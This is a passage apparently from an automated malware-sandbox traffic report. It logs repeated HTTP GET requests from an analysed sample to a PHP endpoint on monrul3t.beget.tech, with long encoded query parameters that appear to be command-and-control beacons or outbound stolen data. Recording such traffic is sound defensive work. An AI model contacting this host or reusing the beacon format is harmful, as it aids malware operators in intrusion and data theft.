RNpXSqlkNJNkUKJVbjhWOtlVeWdUYwkzVUl2dplEeZV0V0smaNVUOFJ1QKl2TplEWalnVIRmaG1mWxUzVZ5kUtNGa50WW5Z1RhBTOXRVa3lWSYlDMTVEZ6F1MJVlVEpUaPlWVXJGa1UkW5ZkMilmSYp1bSNjYOp0QMlWRqNGb4dkY2pESkVXOyEldWdkWwpFbJZTSDplSWJTWwpFWaVkVGVFSKNETp9GSTdWUq5UavpWSsJFWZNFayMGbK5mWspkRlhWMVZVUktWSzlUejlXOHJmdOdUSysmaNNTWU9EMrpWTwE0QldWUq10dFRUS0I0QNRTSU1UavpWS1lzVhBjQYFWeOJzYsJVVatWOXRldWdkWwplVWFFZrl0cJlWUIJ0UNl2bqlUNKNjY0Z1VUZnVHpFcaZlVRR2aJNXSDJFTGtWTFZFMSdkSp9UaJNjY65EWapWOtNWU5clWrxWbWZlQxIVa3lWSxkUaPlWVtNWMSNTWsJFWh9mTtNmQ5clWrxWbWZlQxIVa3lWSI5EMURkSqlkNJNlW0ZUbUZlQxIVa3lWS1cmeRNTSr1UNZVlUFpUaPlWUXNVe5IzY6ZlMZZnSIVlVCFTUpdXaJdXVGVFRKl2TpF1VTxmTXFmMWdkUWJUMRl2dD1kNJlmY2xmMjBnWYp1UWZUVEp0QMl2bINlTCNUT3FkaNl2bql0aWdlW35UMhpWOHJGRS5mYspkbjFjTVZVUOtWSzl0URZHNrlkNJNkWsZ1RjRFdykld4JTUzZUbilnVHRGNWVlVR50aJNXSpFFc0VUS3FFROhXWqlkNJNlW2wmMVxGaykFaOBTTNZlRVRkSDxUaJVVYMJ0QPBTQq1UavpWSsBHWhRlVHFmaGJTU5dXVWFlTrl0cJN1Tp9maJxmSYRGMOdlWww2RhpmSYFlVCFTUpd3UNZTS5NWe5IzY6ZlMZZnSIV1cGJTWwRmMi1kVGVFRKNETw8maJpnVtNmdOVlVR50aJNXSD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXNVavpWS1lzVhBjQYFWeOJzYsJVVWFlTrl0cJlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIzMDNhdTO3MmYxIjMmJDOwIDO0MWO3YmZwE2YxQjZzETMjhDO3YmYhJiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&c9ac4e72985eee3d90507dfb878ca2be=QX9JSUNJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3IDNiR2NlZDZxQGZ3QDM2YzMyEmM1UjN0YDOjlTM4ITYyQmMlljZxIiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWaJRUT2klaNZTUE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNTSU1UbCpWSzl0UKdXSp9UaR1mT0k1RNlmWU1UaGdVW4V1VNVTVqllaWdlT5V1RPdXQU1kMVpnTqZ1RNhmUUlVNJ1WWtplaJNXSTpUNrpWS2k0QNFTUU1kMZRkTyUEVPtmU610dJ1mW6llaaBzZU5ENRd1TqZkaaBTQUlFaa1mTsZlaORTV61Ua3lWSvkUaPlWUql1MV1WWqZ1VNpmV61kMBpnTrxGVNpmSH9UbSdkTyklMNhXTUpVeVRVTzkFVNRTWH90MnpWSzlUeQl2bql0dnRkWxE1RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlWTYJ2ZJR1Tp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWaFRlT2kEROZTUE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNTSU1UbCpWSzl0UKdXSp9UaR1mT0k1RNlmWU1UaGdVW4V1VNVTVqllaWdlT5V1RPdXQU1kMVpnTqZ1RNhmUUlVNJ1WWtplaJNXSTpUNrpWS2k0QNFTUU1kMZRkTyUEVPtmU610dJ1mW6llaaBzZU5ENRd1TqZkaaBTQUlFaa1mTsZlaORTV61Ua3lWSvkUaPlWUql1MV1WWqZ1VNpmV61kMBpnTrxGVNpmSH9UbSdkTyklMNhXTUpVeVRVTzkFVNRTWH90MnpWSzlUeQl2bql0dnRkWxE1RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlWTYJ2ZrRlTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNG